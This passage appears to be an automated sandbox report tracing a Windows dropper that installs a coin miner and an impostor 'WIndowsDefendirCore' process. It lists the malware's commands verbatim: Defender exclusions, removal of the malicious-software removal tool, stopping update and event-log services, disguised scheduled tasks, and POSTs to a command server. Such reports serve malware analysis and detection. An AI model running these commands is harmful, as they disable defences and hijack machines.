PID 1428 wrote to memory of 4356	1428	WIndowsDefendirCore.exe	176
PID 1428 wrote to memory of 2200	1428	WIndowsDefendirCore.exe	183
PID 1428 wrote to memory of 2200	1428	WIndowsDefendirCore.exe	183
PID 2200 wrote to memory of 1584	2200	cmd.exe	185
PID 2200 wrote to memory of 1584	2200	cmd.exe	185
PID 2200 wrote to memory of 2912	2200	cmd.exe	186
PID 2200 wrote to memory of 2912	2200	cmd.exe	186
PID 2200 wrote to memory of 224	2200	cmd.exe	188
PID 2200 wrote to memory of 224	2200	cmd.exe	188

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\235215E48C6B826E256D5918CBB1B0DA.exe
"C:\Users\Admin\AppData\Local\Temp\235215E48C6B826E256D5918CBB1B0DA.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788
- C:\Users\Admin\AppData\Local\Temp\New.exe
  "C:\Users\Admin\AppData\Local\Temp\New.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\DirecctX\xxNjaoakdqlq77rW9ny37esSaaIYvVrl9XvRF2EmRo3BjUX9SZCU8jwS.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\DirecctX\emdqIIr51ANxc8YnT8oM67sWOC7lQfL50WxcLdlgUyJcLXMn.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2600
    - - C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe
        
        "C:\Users\Admin\AppData\Roaming\DirecctX/WIndowsDefendirCore.exe"
        5⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        Drops file in Program Files directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1428
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s5zmmqib\s5zmmqib.cmdline"
        6⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:4424
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD820.tmp" "c:\Windows\System32\CSCB92BA4CCAE6949149EF399A9C45CDC4F.TMP"
        7⤵
        
        PID:4672
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Recent\winlogon.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\Gadgets\WIndowsDefendirCore.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:812
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\System.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\sr-Latn-RS\lsass.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4572
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Modules\backgroundTaskHost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4648
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4356
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FAvcGeI3ml.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2200
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1584
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2912
        
        C:\Program Files (x86)\Windows Sidebar\Gadgets\WIndowsDefendirCore.exe
        
        "C:\Program Files (x86)\Windows Sidebar\Gadgets\WIndowsDefendirCore.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:224
- C:\Users\Admin\AppData\Local\Temp\build.exe
  "C:\Users\Admin\AppData\Local\Temp\build.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1144
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2300
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5104
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2356
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2856
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:4536
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1216
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1528
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1472
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4528
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1468
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "ZNALQAQP"
    3⤵
    - Launches sc.exe
    PID:3068
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "ZNALQAQP" binpath= "C:\ProgramData\xkfaujlbhedp\bjqgtalbkeyq.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2852
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3560
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "ZNALQAQP"
    3⤵
    - Launches sc.exe
    PID:4996

C:\ProgramData\xkfaujlbhedp\bjqgtalbkeyq.exe
C:\ProgramData\xkfaujlbhedp\bjqgtalbkeyq.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1000
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3012
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4504
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5056
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:512
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2560
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1156
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3676
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:808
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2580
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1628
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3444
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:544
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Recent\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Admin\Recent\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Recent\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCoreW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\WIndowsDefendirCore.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCore" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\WIndowsDefendirCore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCoreW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\WIndowsDefendirCore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\Default\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Windows\SysWOW64\sr-Latn-RS\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\SysWOW64\sr-Latn-RS\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\SysWOW64\sr-Latn-RS\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCoreW" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCore" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCoreW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1484

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=32B939DF425B6A8F0B732C59437C6BEF; domain=.bing.com; expires=Thu, 26-Feb-2026 18:20:30 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EB63F302711641F59F1F13C31A62DBD0 Ref B: LON04EDGE0618 Ref C: 2025-02-01T18:20:30Z
date: Sat, 01 Feb 2025 18:20:30 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=32B939DF425B6A8F0B732C59437C6BEF

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=EqiuPT6Zu1epY4Xo354faomG75CI6RE8zcDP3BdRaxc; domain=.bing.com; expires=Thu, 26-Feb-2026 18:20:30 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4008C597FD874EF5ACF3D027C5AA0238 Ref B: LON04EDGE0618 Ref C: 2025-02-01T18:20:30Z
date: Sat, 01 Feb 2025 18:20:30 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=32B939DF425B6A8F0B732C59437C6BEF; MSPTC=EqiuPT6Zu1epY4Xo354faomG75CI6RE8zcDP3BdRaxc

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 060FB3EA31064A1286DB6A2FBE9365D7 Ref B: LON04EDGE0618 Ref C: 2025-02-01T18:20:30Z
date: Sat, 01 Feb 2025 18:20:30 GMT
DNS

3.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.31.126.40.in-addr.arpa

IN PTR

Response
DNS

20.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.49.80.91.in-addr.arpa

IN PTR

Response
DNS

58.99.105.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.99.105.20.in-addr.arpa

IN PTR

Response
DNS

pool.hashvault.pro

explorer.exe

Remote address:

8.8.8.8:53

Request

pool.hashvault.pro

IN A

Response

pool.hashvault.pro

IN A

192.248.189.11

pool.hashvault.pro

IN A

80.240.16.67
DNS

11.189.248.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.189.248.192.in-addr.arpa

IN PTR

Response

11.189.248.192.in-addr.arpa

IN PTR

19224818911vultrusercontentcom
DNS

pastebin.com

explorer.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

104.20.4.235

pastebin.com

IN A

104.20.3.235

pastebin.com

IN A

172.67.19.24
DNS

235.4.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.4.20.104.in-addr.arpa

IN PTR

Response
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

babos.top

WIndowsDefendirCore.exe

Remote address:

8.8.8.8:53

Request

babos.top

IN A

Response

babos.top

IN A

104.21.48.1

babos.top

IN A

104.21.80.1

babos.top

IN A

104.21.16.1

babos.top

IN A

104.21.96.1

babos.top

IN A

104.21.112.1

babos.top

IN A

104.21.64.1

babos.top

IN A

104.21.32.1
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PvxYD8pz0%2BaUzKk916dOsN0wH0YaJUQ7jyCMcGyT%2B0FeboNvjOIBmNGFs3BWs6V9uE3Tq461wVlmnIO3oxyjrNdMa8fnSaz3wFnp%2FdmM0p4QIvrkVRAmWafu2Dg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f59d7957f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=27419&min_rtt=26821&rtt_var=11255&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=632&delivery_rate=42926&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 384
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6OQg7oiH3UoJHdqMRX99aqdhT7VrSYLiVfxlaNn00JFdPlbkkJ0f2%2FYMypVOMv55dk1rxvtG3zOLJSzam%2BPkIWcSMArpVVsqRfBtp8%2Fk943s3Tej1X4EAC9C%2F64%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f59f4e79f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=31800&min_rtt=26821&rtt_var=11440&sent=9&recv=7&lost=0&retrans=0&sent_bytes=2205&recv_bytes=1280&delivery_rate=93238&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWfrWAGA8kA8Z8mnn%2BqGEgMMlGJ%2F9pje5kLzAhXDHa76Rb6CH%2BjwKl8TR4KbYIqD2IqG5cRL%2FF8RQtmczFvFwWr%2Fo8nIArQM9FtDEgYMZNZDgbXZuANjnBHcch4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5a14bb3f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=34493&min_rtt=26821&rtt_var=11366&sent=14&recv=11&lost=0&retrans=0&sent_bytes=3177&recv_bytes=2949&delivery_rate=93238&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1388
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jEmZxcYFuyba5NtXeRrgInoLVvxAUURetdsuWqULGJu2rxHl%2Bkq1WSxcNCyiTLU14aTo4%2FmGk9AvnWy4%2FXCuIzl7b5g4mvwF3yhS63xrfFOkkYvfQqfbC8JlPsA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5abade7f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=43223&min_rtt=26821&rtt_var=25817&sent=19&recv=15&lost=0&retrans=0&sent_bytes=4153&recv_bytes=4602&delivery_rate=93238&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

